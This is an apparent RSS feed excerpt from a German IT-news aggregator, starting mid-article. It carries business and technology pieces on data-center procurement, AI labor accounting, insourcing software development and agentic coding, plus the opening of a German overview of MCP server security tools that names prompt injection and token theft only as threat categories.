<h2 class="wp-block-heading">The roadmap for the modern CIO</h2>



<p class="wp-block-paragraph">To lead this transformation, CIOs must move beyond the IT shop mentality and become master orchestrators of the supply chain. Here is the 1500-word reality condensed into three mandates:</p>



<ol start="1" class="wp-block-list">
<li><strong>Standardize the product:</strong> Stop designing bespoke facilities. Move toward DFMA (design for manufacturing and assembly). If 70% of your data center can be built in a factory and shipped as modules, you bypass the unpredictability of on-site labor.</li>



<li><strong>Integrate the financial stack:</strong> If your construction management software and your ERP aren’t sharing a heartbeat, your data is lying to you. Force the integration between Procore and Yardi.</li>



<li><strong>Own the long poles:</strong> Don’t leave the procurement of transformers and cooling units to general contractors. Use your balance sheet to secure these items years in advance. In 2026, inventory is the new currency.</li>
</ol>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Modest but notable’ regional spread of fintech funding in UK]]></title>
<description><![CDATA[Hubs outside London have made some headway in the UK fintech sector, but overall funding has dropped]]></description>
<link>https://tsecurity.de/de/3686184/it-nachrichten/modest-but-notable-regional-spread-of-fintech-funding-in-uk/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3686184/it-nachrichten/modest-but-notable-regional-spread-of-fintech-funding-in-uk/</guid>
<pubDate>Wed, 22 Jul 2026 13:52:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Hubs outside London have made some headway in the UK fintech sector, but overall funding has dropped]]></content:encoded>
</item>
<item>
<title><![CDATA[The AI bill is the easy part. The hard part is everything it changed]]></title>
<description><![CDATA[Your CFO has a simple question. “We’re spending more on AI. What are we getting for it?” Most CIOs cannot answer it — not because AI isn’t creating value, but because the accounting systems we inherited were built before AI existed as a category of labor.



This June, the conversation shifted fr...]]></description>
<link>https://tsecurity.de/de/3685909/it-security-nachrichten/the-ai-bill-is-the-easy-part-the-hard-part-is-everything-it-changed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685909/it-security-nachrichten/the-ai-bill-is-the-easy-part-the-hard-part-is-everything-it-changed/</guid>
<pubDate>Wed, 22 Jul 2026 12:14:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Your CFO has a simple question. “We’re spending more on AI. What are we getting for it?” Most CIOs cannot answer it — not because AI isn’t creating value, but because the accounting systems we inherited were built before AI existed as a category of labor.</p>



<p class="wp-block-paragraph">This June, the conversation shifted from token maxing to token cutting. <a href="https://www.nytimes.com/">The New York Times</a> reported that Meta, Uber, Walmart and Amazon are capping employee AI usage. Uber blew through its 2026 AI budget in four months. Satya Nadella started framing it as human capital versus token capital.</p>



<p class="wp-block-paragraph">All of that is true. None of it answers the CFO. Capping tokens is an input lever, not an output measure. And the <a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">human-versus-token framing</a> names two sources of labor when the reality is four.</p>



<h2 class="wp-block-heading">The enterprise now has 4 sources of labor</h2>



<p class="wp-block-paragraph">There are humans. There are humans assisted by AI. Humans are working alongside AI. And humans are managing AI. Sources two through four are all supervised machine labor at different intensities — none of them have a line item, a manager or an hourly rate. In our <a href="https://withlanai.com/ai-labor-report">2026 AI Labor Report</a>, 78% of leaders view AI as both software and a labor force. The org chart has not caught up. Neither has the P&amp;L.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-1-four-source-framework.png?w=1024" alt="Four-source framework and A-Level taxonomy: Lanai  ·  Lanai / Wakefield Research, n=200, March–April 2026" class="wp-image-4198947" width="1024" height="502" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Four-source framework and A-Level taxonomy: Lanai  ·  Lanai / Wakefield Research, n=200, March–April 2026</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<p class="wp-block-paragraph">Most enterprises are stuck at A-Level 1 with no accounting for any of it, while quietly sliding into A-Level 2. The job descriptions have not caught up. The budget has not caught up. You cannot upskill into a role that has not been named.</p>



<p class="wp-block-paragraph">AI is the only category of work the modern enterprise has ever bought without a system of record for what it produced.</p>



<h2 class="wp-block-heading">What you are actually running is supervised machine labor</h2>



<p class="wp-block-paragraph">The model does a first pass. A human makes it usable. One hundred percent of leaders we surveyed said AI work requires human review before it ships; 34% said substantial editing. That is a workforce with no manager, no hourly rate and no line on the income statement.</p>



<h3 class="wp-block-heading">The accounting breaks in 3 places at once</h3>



<p class="wp-block-paragraph">Under GAAP: COGS if it helps produce the product, OpEx if it does work for you. The same workflow can hit all three buckets at once. A tier-one support resolution involves the human’s salary (OpEx), the AI’s tokens (COGS if support is a delivered service), and the supervisor’s review time (OpEx). Three buckets. One piece of work. No reconciliation. The token invoice arrives from Anthropic or OpenAI and gets coded to OpEx-software because that is what the bill looks like. Audit partners will be asking about this by next year.</p>



<p class="wp-block-paragraph">When you call AI a tool, you book it like software. When you call it labor, you have to ask which kind and what it is producing.</p>



<h2 class="wp-block-heading">The per-employee number is the wrong unit</h2>



<p class="wp-block-paragraph">Per-employee AI spend collapses a workforce into a per-head average. It hides the only number that matters: What AI is producing inside each workflow.</p>



<p class="wp-block-paragraph">Lanai measured two teams inside the same finance organization. Same monthly prep and variance analysis. AI took the same amount of time to produce outputs of similar quality. The only variable was the model each team reached for by default — a choice nobody had made deliberately and <a href="https://withlanai.com/ai-labor-report">nobody had seen until it was measured</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-2-white-labeled-example.png?w=1024" alt="White-labeled example. Workflow profile, hours and economics drawn from a representative customer engagement." class="wp-image-4198945" width="1024" height="485" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>White-labeled example. Workflow profile, hours and economics drawn from a representative customer engagement.</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<p class="wp-block-paragraph">The gap existed for months before anyone saw it.</p>



<p class="wp-block-paragraph">Faith-based budgeting — the organizational equivalent of putting money in the collection plate and hoping God handles the ROI — is what made it invisible.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-3-lanai-wakefield-research.png?w=1024" alt="Lanai / Wakefield Research  ·  n=200  ·  U.S. enterprises 1,000+  ·  March–April 2026" class="wp-image-4198944" width="1024" height="199" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Lanai / Wakefield Research  ·  n=200  ·  U.S. enterprises 1,000+  ·  March–April 2026</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<h2 class="wp-block-heading">AI labor orphaning</h2>



<p class="wp-block-paragraph">That is not a measurement problem. It is a category error. We call it AI Labor Orphaning. AI does the work. The output gets credited to the human who approved it. The token bill lands in OpEx-software. The supervision time absorbs into salaried hours nobody is auditing. Eighty-seven percent of leaders admitted AI output is sometimes or always credited entirely to the human employee. This is the last-click attribution problem of the AI era, running in reverse.</p>



<p class="wp-block-paragraph">What fills the vacuum? Belief. Forty-three percent assume that if AI was involved, it contributed. Only twelve percent have a clear methodology. Seventy-nine percent are worried AI budgets will be cut because they cannot connect spend to results. The cuts are not coming because AI does not work. They are coming because nobody can prove that it did.</p>



<p class="wp-block-paragraph">Capping tokens may look like responsible governance, but it is like turning off a staticky radio rather than tuning the dial. The companies cutting AI budgets in 2026 will discover in 2027 that they cut the workflows that worked alongside the ones that did not.</p>



<h2 class="wp-block-heading">The real cost of AI is not the model. It is the redesign</h2>



<p class="wp-block-paragraph">Three layers. Most organizations only manage the first.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/07/table-4-managing-layer-one.png?w=1024" alt="Managing Layer 1 without Layers 2 and 3 is how you optimize the invoice while missing the transformation." class="wp-image-4198946" width="1024" height="335" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Managing Layer 1 without Layers 2 and 3 is how you optimize the invoice while missing the transformation.</em></figcaption></figure><p class="imageCredit">Lexi Reese</p></div>



<h2 class="wp-block-heading">What to actually do</h2>



<p class="wp-block-paragraph">The <a href="https://withlanai.com/ai-labor-report">12% of organizations</a> that can answer the CFO treat AI like every other category of labor — with a cost per AI Work Hour that is accounted for by a set of AI assistants, co-pilots and agents that are held accountable to performance standards. </p>



<ul class="wp-block-list">
<li>Audit the four sources separately. Each A-Level has different token economics, SaaS implications and human redesign requirements.</li>



<li>Find the embedded SaaS repricing before your next renewal. Pull your top 20 contracts. Ask whether AI features previously included are now priced incrementally.</li>



<li>Redesign the human role at A-Level 2 before you scale it. You cannot upskill into a role that has not been named.</li>



<li>Build a system of record before you build the next agent. Start with one department. Two weeks. You will find something that surprises you.</li>



<li>Stop calling it a tool. Start calling it labor. The language determines the chart of accounts.</li>
</ul>



<p class="wp-block-paragraph">When your blended AI rate is $22 an hour, the conversation shifts from ‘we spent $340,000 on AI’ to ‘we acquired a skilled workforce at $22 an hour.’ That sentence is defensible. A vendor invoice is not.</p>



<p class="wp-block-paragraph">The CIOs who will have a defensible AI story in 2027 are the ones who renamed the work in 2026. Not because technology changed. Because they finally built the accounting to see it.</p>



<p class="wp-block-paragraph"><em>Findings are drawn from the </em><a href="https://withlanai.com/ai-labor-report">2026 AI Labor Report</a><em>, fielded by Wakefield Research with 200 senior technology leaders at US enterprises of 1,000-plus employees, March 20–April 8, 2026 (±6.9pp at 95% confidence).</em></p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[From outsourcing to ownership: How we brought development in-house without breaking delivery]]></title>
<description><![CDATA[Outsourcing worked – until it didn’t.



After Akirolabs achieved early market validation and onboarded its first enterprise customers, outsourcing began to create strategic limitations around scalability, intellectual property (IP) ownership, security and delivery execution.



The challenges st...]]></description>
<link>https://tsecurity.de/de/3685759/it-security-nachrichten/from-outsourcing-to-ownership-how-we-brought-development-in-house-without-breaking-delivery/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685759/it-security-nachrichten/from-outsourcing-to-ownership-how-we-brought-development-in-house-without-breaking-delivery/</guid>
<pubDate>Wed, 22 Jul 2026 11:11:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Outsourcing worked – until it didn’t.</p>



<p class="wp-block-paragraph">After Akirolabs achieved early market validation and onboarded its first enterprise customers, outsourcing began to create strategic limitations around scalability, intellectual property (IP) ownership, security and delivery execution.</p>



<p class="wp-block-paragraph">The challenges started after the first enterprise customers confirmed product-market fit. At that point, delivery speed became directly tied to business growth. Product quality expectations increased. Infrastructure and security requirements became stricter. Investors started asking difficult but<a href="https://www.cio.com/article/4069909/10-outsourcing-strategy-questions-every-it-leader-must-answer.html"> </a><a href="https://www.cio.com/article/4069909/10-outsourcing-strategy-questions-every-it-leader-must-answer.html">fair questions</a> about IP ownership, operational dependencies and long-term scalability.</p>



<p class="wp-block-paragraph">Most importantly, engineering execution was no longer just an operational function – it became part of the company’s strategic advantage. That was the moment when the founders decided the company needed dedicated technology leadership to address these challenges. This is how I joined the company at the beginning of 2023. As VP of Engineering and a bit later as CTO, I led the transformation (usually known as<a href="https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html"> </a><a href="https://www.cio.com/article/272355/outsourcing-outsourcing-definition-and-solutions.html">insourcing, repatriating or backsourcing</a>) from an outsourced model to an internal engineering organization while maintaining product delivery continuity and preparing the company for the next growth stage. The process took roughly a year and involved not only technical migration, but also organizational design, hiring, process development, infrastructure modernization and cultural transformation – everything from the ground up.</p>



<h2 class="wp-block-heading">Building an internal engineering organization while still delivering</h2>



<p class="wp-block-paragraph">One of the biggest misconceptions about insourcing is that it is primarily a technical project. It is a leadership and execution challenge.</p>



<p class="wp-block-paragraph">When I joined the company, there was effectively no internal engineering structure, limited visibility into the existing system and no clear long-term technical strategy. My first months were dedicated to understanding reality and I began with a comprehensive assessment of the codebase, operational risks, documentation quality and knowledge dependencies to determine the most viable transition strategy.</p>



<p class="wp-block-paragraph">Very early in the process, I faced a critical strategic decision: whether to gradually assume ownership of the existing platform or rebuild it internally. To make that decision, I evaluated four distinct transition models ranging from limited management insourcing to a complete internal rebuild.</p>



<p class="wp-block-paragraph">After assessing the technical, operational and long-term business implications of each approach, I selected the most demanding option: rebuilding the product internally while maintaining uninterrupted delivery for existing customers. Although riskier in the short term, a full rebuild offered the clearest route to complete IP ownership, architectural flexibility and long-term scalability.</p>



<p class="wp-block-paragraph">At the time, this decision ran counter to the approach typically taken by startups in similar situations. Most organizations gradually assume ownership of an existing codebase to minimize short-term risk and preserve delivery capacity. My assessment was that the accumulated architectural debt, fragmented knowledge distribution and long-term maintenance risks would ultimately make a phased takeover more expensive and less scalable than a controlled rebuild. The strategy required significantly higher execution discipline, but it allowed us to establish complete ownership of the platform, eliminate inherited constraints and create an architecture capable of supporting enterprise-scale growth.</p>



<p class="wp-block-paragraph">The next challenge was hiring.</p>



<p class="wp-block-paragraph">In Germany, hiring can easily take four to six months – mostly due to a typical 3-month notice period, which is incompatible with startup timelines. We solved this by building a hybrid organization structure early: a lean internal core team combined with carefully selected contractors. Instead of hiring only narrow specialists, we prioritized experienced generalists capable of operating across architecture, infrastructure, security and compliance discussions. Later, we evolved toward a<a href="https://docs.google.com/document/d/1uSc1o6hdJ5AweCsjcLzo3JAzvq1q-7ALl1MPMNWx2sQ/edit?usp=sharing"> </a><a href="https://docs.google.com/document/d/1uSc1o6hdJ5AweCsjcLzo3JAzvq1q-7ALl1MPMNWx2sQ/edit?usp=sharing">product engineering model</a>, where engineers owned broader product outcomes rather than narrowly defined technical functions.</p>



<p class="wp-block-paragraph">During the first three months, we established a core engineering team of four senior engineers. Over the following nine months, the organization expanded to roughly fifteen engineers while I strategically designed and executed the transformation of the platform’s architecture to meet the rigorous deployment and compliance standards of our first enterprise clients, including Raiffeisen Bank International and Bertelsmann. This structural overhaul allowed the company to meet the deployment, security and compliance requirements of enterprise customers that had previously been inaccessible under the outsourced model. At that point, we had already achieved complete coverage across backend, frontend, DevOps, QA and security.</p>



<p class="wp-block-paragraph">I also intentionally kept processes lightweight during the transition. Instead of introducing heavyweight frameworks, we focused on clarity of priorities, fast decision-making and execution discipline. We used Kanban over Scrum, eliminated unnecessary meetings, shortened the remaining ones and emphasized engineering culture over process overhead.</p>



<p class="wp-block-paragraph">Another major challenge was project estimation. Because dual-track development was unavoidable until the in-house platform reached production readiness, estimation accuracy had a direct impact on budget efficiency. Despite all challenges, my initial estimate ultimately proved remarkably close to the final delivery date, differing by only about a week. Accurate forecasting under conditions of parallel development streams, ongoing customer commitments and active team formation became a critical leadership challenge. Maintaining this level of predictability throughout the transition helped align engineering execution with business planning, hiring decisions and investor expectations.</p>



<p class="wp-block-paragraph">The engineering transformation enabled capabilities that contributed to Akirolabs being recognized as an IDC Innovator in Procurement in 2023, named amongst the Top 27 AI Startups in Germany in 2024, Sifted’s 100 Fastest-Growing Startups in DACH &amp; CEE 2025 and inclusion in 2024-2026 in ProcureTech100 annual recognition of procurement technology providers shaping the future of digital procurement.</p>



<h2 class="wp-block-heading">Managing risk without slowing down the business</h2>



<p class="wp-block-paragraph">The hardest part of insourcing is not writing code, selecting the technology stack, designing architecture or configuring infrastructure. It is avoiding disruption while the company is changing underneath the product. I successfully orchestrated the concurrent overhaul of product architecture, cross-functional engineering recruitment, infrastructure modernization and live customer operations under exceptionally tight margins.</p>



<p class="wp-block-paragraph">To reduce delivery risk, we approached the transition in layers.</p>



<p class="wp-block-paragraph">First, we focused on<a href="https://platformengineering.com/features/the-platform-centric-shift-why-enterprise-ai-teams-need-internal-ai-platforms-not-more-engineers/"> </a><a href="https://platformengineering.com/features/the-platform-centric-shift-why-enterprise-ai-teams-need-internal-ai-platforms-not-more-engineers/">infrastructure reliability and operational readiness</a> before feature expansion. Cloud architecture, recovery testing, permission segregation and incident management processes were implemented early, not after launch. We also introduced multiple testing stages and dedicated QA functions after learning the hard way that a “developers-only” quality control approach does not scale for complex web platforms and business domains.</p>



<p class="wp-block-paragraph">Second, we established a structured knowledge-transfer process to rapidly onboard engineers and reduce external dependencies.</p>



<p class="wp-block-paragraph">Third, we became extremely disciplined about scope management. One of the most common reasons<a href="https://www.cio.com/article/244453/whether-outsourcing-or-insourcing-cios-need-control.html"> </a><a href="https://www.cio.com/article/244453/whether-outsourcing-or-insourcing-cios-need-control.html">insourcing initiatives fail is uncontrolled change</a> during the rebuild phase. Every new feature request increases uncertainty non-linearly. We learned to separate strategic improvements from distractions and protect the core delivery roadmap aggressively. Throughout the transition, we successfully maintained uninterrupted customer operations by utilizing planned maintenance windows, achieved a near-zero-downtime migration and permanently doubled product velocity immediately following the migration.</p>



<p class="wp-block-paragraph">Beyond the technical migration itself, the transition established a repeatable operating model for scaling technology organizations beyond the product-market-fit stage. The framework combined organizational redesign, controlled knowledge repatriation, architecture modernization and enterprise-grade operational practices while maintaining uninterrupted customer delivery throughout the transformation. While the implementation was specific to Akirolabs, the underlying principles are broadly applicable to organizations seeking to transition from outsourced development to internal product ownership without disrupting business operations.</p>



<p class="wp-block-paragraph">By the time the new platform reached production readiness, I had established not only a functioning engineering organization, but also a stable operational model: internal ownership, production-grade infrastructure, security processes, scalable hiring practices and clear technology and product roadmaps.</p>



<p class="wp-block-paragraph">A positive side effect of the transition was the creation of internal UI/UX and Data Science capabilities, which later became strategically important for AI product initiatives and created a foundation for the third version of the product, which we released in mid-2025.</p>



<p class="wp-block-paragraph">My technical restructuring and migration to a secure proprietary platform reduced architectural risk, established full in-house ownership and helped strengthen investor confidence during the company’s successful €5M fundraising round in 2024.</p>



<p class="wp-block-paragraph">The transition created a stronger foundation for scale and supported the company’s continued expansion among enterprise organizations operating at Fortune 500 scale, including Ahold Delhaize, Workday, IFF, Deutsche Bahn and others.</p>



<h2 class="wp-block-heading">Lessons learned for CTOs considering insourcing</h2>



<p class="wp-block-paragraph">Looking back, several decisions made the transition successful, and several mistakes made it harder than necessary.</p>



<p class="wp-block-paragraph">The first lesson is simple: decisiveness in strategic transition is paramount to maintaining business momentum. Rapidly evaluating insourcing frameworks and defining clear boundaries with the external partner allowed us to mitigate operational downtime and execute a highly efficient migration ahead of critical market deadlines.</p>



<p class="wp-block-paragraph">Second, hire more senior people and do it as early as possible. Strong technical leaders multiply execution capacity far beyond their individual contribution. In our case, the quality of the first hires influenced architecture quality, hiring standards, delivery discipline and engineering culture for the entire organization.</p>



<p class="wp-block-paragraph">Finally, culture matters more than frameworks. Processes can be added later. Ownership mentality cannot.</p>



<p class="wp-block-paragraph">The biggest long-term advantage of bringing development in-house was not simply faster execution, not better code quality or operational cost optimization by over 30% after the transition which we also achieved. It was an alignment. Product strategy, engineering decisions, customer priorities and business goals became part of the same conversation instead of being separated by organizational boundaries. For technology companies operating in highly competitive markets, that alignment becomes a compounding advantage over time.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic coding is everywhere]]></title>
<description><![CDATA[I use a very cool and relatively new web framework called Astro. The keen insight that the Astro team had was that most websites are made up of static content, so they made it really easy to add content to a website. To add a blog post to my personal website, all I have to do is create a Markdown...]]></description>
<link>https://tsecurity.de/de/3685748/ai-nachrichten/agentic-coding-is-everywhere/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685748/ai-nachrichten/agentic-coding-is-everywhere/</guid>
<pubDate>Wed, 22 Jul 2026 11:04:58 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">I use a very cool and relatively new web framework called <a href="https://www.infoworld.com/article/3842325/designing-a-dynamic-web-application-with-astro-js.html" data-type="link" data-id="https://www.infoworld.com/article/3842325/designing-a-dynamic-web-application-with-astro-js.html">Astro</a>. The keen insight that the Astro team had was that most websites are made up of static content, so they made it really easy to add content to a website. To add a blog post to <a href="https://nickhodges.com/">my personal website</a>, all I have to do is create a Markdown file with some front matter, deploy it, and the blog post automatically appears. If I need to reach deeper for more dynamic functionality, I can easily do that with <a href="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html" data-type="link" data-id="https://www.infoworld.com/article/2257305/what-is-typescript-strongly-typed-javascript.html">TypeScript</a>, <a href="https://www.infoworld.com/article/2253289/react-tutorial-get-started-with-the-reactjs-javascript-library.html" data-type="link" data-id="https://www.infoworld.com/article/2253289/react-tutorial-get-started-with-the-reactjs-javascript-library.html">React</a>, or almost any other framework. It’s really cool.</p>



<p class="wp-block-paragraph">And these days, I really don’t write any code. <a href="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html" data-type="link" data-id="https://www.infoworld.com/article/4136718/claude-code-is-blowing-me-away.html">Claude Code</a> does most (all?) of the work. Since Astro is <a href="https://github.com/withastro/astro">an open-source project</a> and has <a href="https://docs.astro.build/">excellent documentation</a>, Claude knows all about how Astro works. It has no trouble at all managing my site and making the improvements I ask for.  </p>



<p class="wp-block-paragraph">And that got me thinking, how does Astro get built? Is the Astro team building with agentic coding? Astro itself has many dependencies, including big projects like Vite and Node. And of course, Vite and Node have dependencies, too. Are those dependencies being developed by hand, or are those development teams also using AI agents to code?</p>



<p class="wp-block-paragraph">My curiosity got the best of me, and I asked Claude to dig deeper. It turns out that the Astro repository has <a href="https://github.com/withastro/astro/blob/main/AGENTS.md">an AGENTS.md</a> file, and some of the commits even have commit message trailers indicating that they were at least co-authored by Claude and <a href="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html" data-type="link" data-id="https://www.infoworld.com/article/3609013/github-copilot-everything-you-need-to-know.html">GitHub Copilot</a>. Further down, there is a <code>.agents/skills</code> directory with skills covering development, merging, triage, and more. I poked around for a look, and someone has done a great job building agentic support.</p>



<p class="wp-block-paragraph">Now my interest is really piqued, and further investigation reveals quite a bit of interesting stuff. About a year ago, documentation started appearing about how to build Astro sites with coding agents.  Around that same time, the docs team released an <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP server</a> that gives developers coding agents deeper, easier access to the Astro documentation.  </p>



<p class="wp-block-paragraph">And there are small steps in the Astro codebase that indicate it is “agentic ready.” For instance, the command-line development server can tell when it is being started by an agent, and the application itself can tell if it is being driven by an agent. Small things, but steps in the direction of embracing Astro developers who use coding agents. </p>



<p class="wp-block-paragraph">Okay, that was a fun spelunking trip. But so what?</p>



<p class="wp-block-paragraph">The “so what” is that code is going to be commoditized. As an Astro developer I am using AI agents pretty much all of the time. The Astro development team is starting to use AI agents more and more. The folks building the Astro dependencies are using AI agents. Shoot, the people building Claude Code and the agents themselves are “eating their own dogfood” and <a href="https://www.anthropic.com/institute/recursive-self-improvement">using their own tools to build the next frontier model</a>. Before we know it, it will be <a href="https://en.wikipedia.org/wiki/Turtles_all_the_way_down">turtles all the way down</a>. </p>



<p class="wp-block-paragraph">No one says “who generated that electricity?” or “who wove the fabric in that shirt?” any more. And it won’t be long before no one says “Who wrote the code for that app?” because it won’t matter. Just as we don’t look at the assembly code written by our compilers, we’ll stop looking at the “regular” code written by our agents. I’m not even sure anyone is <a href="https://news.ycombinator.com/item?id=39587051" data-type="link" data-id="https://news.ycombinator.com/item?id=39587051">writing assembly code anymore</a>. Soon we’ll be saying that about TypeScript, Python, and C++.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tools, um MCP-Server abzusichern]]></title>
<description><![CDATA[width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px">Unabhängig davon, welche MCP-Server Unternehmen wofür einsetzen – “Unsicherheiten” sollten dabei außenvorbleiben.Gorodenkoff | shutterstock.com



Model Context Protocol (MCP) verbindet KI-Agenten mit Datenquellen und erfre...]]></description>
<link>https://tsecurity.de/de/3685216/it-security-nachrichten/tools-um-mcp-server-abzusichern/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3685216/it-security-nachrichten/tools-um-mcp-server-abzusichern/</guid>
<pubDate>Wed, 22 Jul 2026 06:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large is-resized"> width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"&gt;<figcaption class="wp-element-caption">Unabhängig davon, welche MCP-Server Unternehmen wofür einsetzen – “Unsicherheiten” sollten dabei außenvorbleiben.</figcaption></figure><p class="imageCredit">Gorodenkoff | shutterstock.com</p></div>



<p class="wp-block-paragraph">Model Context Protocol (<a href="https://www.computerwoche.de/article/4031227/was-ist-model-context-protocol.html" target="_blank">MCP</a>) verbindet KI-Agenten mit Datenquellen und erfreut sich im Unternehmensumfeld wachsender Beliebtheit. Allerdings ist auch MCP nicht frei von Sicherheitslücken, wie entsprechende Entdeckungen, etwa beim SaaS-Anbieter <a href="https://www.upguard.com/blog/asana-discloses-data-exposure-bug-in-mcp-server" target="_blank" rel="noreferrer noopener">Asana</a> oder dem IT-Riesen <a href="https://www.catonetworks.com/blog/cato-ctrl-poc-attack-targeting-atlassians-mcp/" target="_blank" rel="noreferrer noopener">Atlassian</a> gezeigt haben. Inzwischen hat sich jedoch einiges in Sachen MCP-Sicherheit getan. Einerseits wurden mit Blick auf das Kernprotokoll etliche Fortschritte erzielt. Beispielsweise in Form von Support für OAuth sowie für Authentifizierungs-Server von Drittanbietern und Identity-Management-Systeme. Darüber hinaus wurde inzwischen auch eine <a href="https://modelcontextprotocol.info/tools/registry/" target="_blank" rel="noreferrer noopener">offizielle MCP Registry</a> geschaffen, die einen Überblick über sichere, öffentlich verfügbare MCP-Server bietet.</p>



<p class="wp-block-paragraph">Dennoch bestehen weiterhin Sicherheitslücken, die sich für diverse Cyberschandtaten ausnutzen lassen – <a href="https://www.computerwoche.de/article/4044551/wenn-der-ki-agent-im-fakeshop-kauft.html" target="_blank">Prompt Injection</a>, Tool Poisoning, Token-Diebstahl, Server-übergreifende Attacken oder manipulierte Messages sind nur einige von vielen Beispielen. Mit anderen Worten: Unternehmen, die sich beim <a href="https://www.computerwoche.de/article/4049237/3-tipps-um-agentic-ai-systeme-in-der-cloud-zu-entwickeln.html" target="_blank">Aufbau von Agentic-AI-Systemen</a> einen Wettbewerbsvorteil verschaffen wollen, müssen erhebliche Anstrengungen unternehmen, um zu gewährleisten, dass sensible Daten nicht nach außen dringen. Glücklicherweise gibt es diverse Tools, die dabei Unterstützung versprechen.</p>



<p class="wp-block-paragraph">In diesem Artikel lesen Sie:</p>



<ul class="wp-block-list">
<li>was Security-Tools für MCP leisten sollten, und</li>



<li>welche Angebote in diesem Bereich interessant sind.</li>
</ul>



<h2 class="wp-block-heading">Das sollten MCP-Sicherheitslösungen können</h2>



<p class="wp-block-paragraph">Die Gefahr von Datenlecks, Prompt Injections und weiteren Sicherheitsbedrohungen besteht unabhängig davon, ob Unternehmen:</p>



<ul class="wp-block-list">
<li>ihre eigenen KI-Agenten mit MCP-Servern von Drittanbietern,</li>



<li>ihre eigenen MCP-Server mit Drittanbieter-Agenten, oder</li>



<li>ihre eigenen Server mit den eigenen Agenten verbinden.</li>
</ul>



<p class="wp-block-paragraph">Soll heißen: Unternehmen müssen in jedem Fall Autorisierungen und Berechtigungen überprüfen, detaillierte Zugriffskontrollen implementieren und alles protokollieren. Daraus ergeben sich auch die Anforderungen für MCP-Sicherheitslösungen. Diese sollten bieten:</p>



<ul class="wp-block-list">
<li><strong>MCP-Servererkennung.</strong> Für Mitarbeiter eines Unternehmens ist es einfach, MCP-Server herunterzuladen und zu nutzen. Mit Scan-Services für MCP-Server können Unternehmen sämtliche Instanzen von Schatten-MCP-Servern in ihrer Umgebung finden.</li>



